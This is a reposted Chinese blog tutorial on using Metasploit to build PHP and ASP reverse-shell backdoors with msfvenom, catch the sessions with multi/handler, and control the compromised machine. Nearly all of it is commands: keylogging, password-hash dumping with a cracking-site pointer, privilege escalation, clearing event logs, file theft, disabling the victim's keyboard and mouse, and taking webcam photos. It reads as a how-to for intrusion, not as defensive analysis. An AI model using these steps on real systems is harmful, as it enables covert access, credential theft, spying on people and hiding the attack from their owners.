码迷,mamicode.com
首页 > Web开发 > 详细

msf建立php反弹shell

时间:2020-02-19 13:05:16      阅读:266      评论:0      收藏:0      [点我收藏+]

标签:erp   star   sdn   漏洞   屏幕截图   asp   keyboard   stop   reboot   

一   建立反弹后门

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php

 

 

注:生成的反弹木马存放在当前用户home目录下;

将生成的木马上传到目标机中,可以远程访问;

windows下asp反弹木马:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

 

 

 

 

 

 

二 监听端口建立会话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)

PAYLOAD =>php/meterpreter/reverse_tcp

3 设置监听主机

msfexploit(multi/handler) > set LHOST 192.168.88.155

LHOST =>192.168.88.155

4 设置监听端口(默认4444)

msfexploit(multi/handler) > set LPORT 4444

LPORT => 4444

5 发动攻击

msfexploit(multi/handler) > exploit

 

注:要远程访问你上传的后门文件

 

meterpreter > keyscan_start

keyscan_dump // 查看键盘记录

监控目标系统键盘输入,停止监控为keyscan_stop

 

meterpreter > migrate

将你的Meterpreter移到另一个进程

先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)

 

meterpreter > getuid

获取用户的服务器运行

meterpreter > shell

进入目标电脑,命令提示符

meterpreter > Idletime

目标电脑闲置了多长时间

meterpreter > Hashdump

导出对方SAM数据库里的内容,推荐一个hash破解网站:

http://www.objectif-securite.ch/products.php

meterpreter > getsystem

利用已自漏洞,自动提权为SYSTEM

 

meterpreter > clearev

清除事件日志

 

 meterpreter > execute(某Windows指令)

在对方电脑上运行该指令

meterpreter > execute 
Usage: execute -f file [options]
 

meterpreter > download(文件路径)

下载文件命令

例如下载C盘下面的jzking121.txt文件

meterpreter > download c:\\jzking121.txt

[*] downloading: c:\jzking121.txt -> jzking121.txt

[*] downloaded : c:\jzking121.txt -> jzking121.txt

注意,文件路径中要有两个\\

Upload指令跟Download指令类似!

 

 meterpreter > shutdown 

关闭目标计算机,reboot为重启计算机

 

meterpreter >screenshot

获取目标电脑,屏幕截图

 

 meterpreter > uictl enable keyboard 启用目标使用键盘

meterpreter > uictl disable mouse   禁止目标使用鼠标

enable 为启用

disable 禁用

 

 meterpreter > webcam_list

目标系统的摄像头列表

 

 meterpreter > webcam_snap

从指定的摄像头,拍摄照片

 

 meterpreter > search -d c:\\ -f 1.jpg

搜索目标电脑,C盘1.jpg文件
————————————————

转载自msdn,原文链接:https://blog.csdn.net/u012991692/article/details/80784258

msf建立php反弹shell

标签:erp   star   sdn   漏洞   屏幕截图   asp   keyboard   stop   reboot   

原文地址:https://www.cnblogs.com/ly584521/p/12330746.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!